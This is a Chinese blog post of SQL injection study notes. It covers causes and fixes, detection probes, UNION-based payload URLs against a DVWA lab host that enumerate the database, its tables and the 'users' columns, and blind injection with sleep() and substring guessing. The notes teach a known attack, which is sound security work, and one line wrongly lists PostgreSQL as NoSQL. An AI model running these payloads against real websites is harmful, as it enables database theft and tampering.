SQL注入(二)

一、SQL注入简介

1.1 sql注入的基本原理

产生原因

web应用程序对用户输入的数据过滤不严谨,并且将输入的数据当做sql语句带入到数据库中去执行。

导致的危害

  • 数据泄露
  • 数据篡改
  • 网站被破坏
  • 写入webshell
  • 远程执行恶意代码

修复建议

  • 对每个网站的数据库用户及权限进行控制,不要用root权限
  • 对传入的特殊字符,例如* & < >等,对这些符号进行转义,或者编码
  • 严格判断传入的数据类型
  • 严格判断传入的数据长度
  • 对sql语句进行预编译和绑定变量
  • 屏蔽报错信息

information_schema库的关键信息

mysql5.0 开始

表一:SCHEMATA

  • schema_name:记录库名

表二:TABLES

  • table_schema:记录的库名
  • table_name:记录的表名

表三:COLUMNS

  • table_schema:记录的库名
  • table_name:记录的表名
  • column_name:记录的字段名

判断是否存在漏洞

id=1 and 1=1

id=1 and 1=2

id=1 or 1=2

id=1 or 1=1

id=1' or '1'='1

id=1" or "1"="1

id=1" or '1'='1'

注入的数据类型

  • int:select * from students where id=1
  • string:select * from students where name=“tom”
  • like:select * from students where name like "t%"

sql中的注释

--空格

#

/*     */

注意:

空格会被url转换成20%

也可用+转换成空格

注入的分类

1. UNION query SQL injection(可联合查询注入)

2. Stacked queries SQL injection(可多语句查询注入)堆叠查询

3. Boolean-based blind SQL injection (布尔型注入)

4. Error-based SQL injection(报错型注入)

5. Time-based blind SQL injection(基于时间延迟注入)

接收用户请求

GET注入

POST注入

COOKIE注入攻击

1.2 union注入

select first_name,last_name from users where user_id = 1' and '1'='1

id=1' and '1'='2

1' and 1=1 -- 

group_concat()

作用:分组打印,将多个信息汇总成一个结果,然后借助于一个回显点进行展示输出

局限性:网页在显示数据的时候,可展示的数据长度往往有限制,那么此时这个函数就要慎用。

注入语句【payload】

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 111,222 --
&Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select
1111,group_concat(user(), 0x3a,database(), 0x3a,version())-- &Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
(select table_name from information_schema.tables where table_schema='dvwa' limit
1)-- &Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
(select table_name from information_schema.tables where table_schema='dvwa' limit
1,1)-- &Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
table_name from information_schema.tables where table_schema='dvwa' limit 1 --
&Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
table_name from information_schema.tables where table_schema='dvwa' limit 1,1 --
&Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
group_concat(table_name) from information_schema.tables where table_schema='dvwa'
-- &Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
group_concat(column_name) from information_schema.COLUMNS where
table_name='guestbook' -- &Submit=Submit

http://172.16.100.5/01/vulnerabilities/sqli/?id=1' and 1=2 union select 1111,
group_concat(column_name) from information_schema.COLUMNS where table_name='users'
-- &Submit=Submit

1.3 盲注

有些网站,用户的输入不会在网页中进行输出,这种网站不能进行UNION注入了,而需要使用盲注,也就是说,如果网站的输出结果是几个固定内容中的一个,那么就需要使用盲注

盲注有两种

布尔盲注:

  • 真:1
  • 假:0

延时盲注

  • sleep()

判断网站是否有漏洞

http://172.16.100.5/01/vulnerabilities/sqli_blind/?id=1' and sleep(3) --
&Submit=Submit#
http://172.16.100.5/01/vulnerabilities/sqli_blind/?id=1' and 1=1 --
&Submit=Submit#
http://172.16.100.5/01/vulnerabilities/sqli_blind/?id=1' and 1=2 --
&Submit=Submit#

if方法

if(条件,值1,值2)
select if(2=2,1,0)

substring方法

substring(目标字符串,开始位置,连续几个字符)
select if(substring("abcdefjho",2,4)

猜解库名的字母

select if(substring(database(),1,1)='h',1,0)

猜解数据库长度

select if(length(database())=7,1,0)

也可以使用Burp进行爆破

1.4 pgsql

数据库的分类

  • 关系型
    • ACID
    • 存储的都是行列构成的数据表
    • 支持事务
    • 数据一致性、安全性较高
    • 性能偏低
    • mysql、SqlServer、Oracle、Access、postgresql、
  • 非关系型【NOSQL】
    • 不支持ACID
    • 存储的通常是非结构化数据
    • 数据一致性较差
    • 性能非常好
    • 存储在内存
    • redis、postgresql、MongoDB、Memcached

什么是事务:

    事务是指数据库执行一批操作,在同一个事务当中,这些操作最终要么全部执行成功,要么全部失败,不会存在部分成功的情况。事务是一个原子操作,是一个最小执行单元,可以由一个或多个sql语句组成

  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ys52IT

你的鼓励将是我创作的最大动力你

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值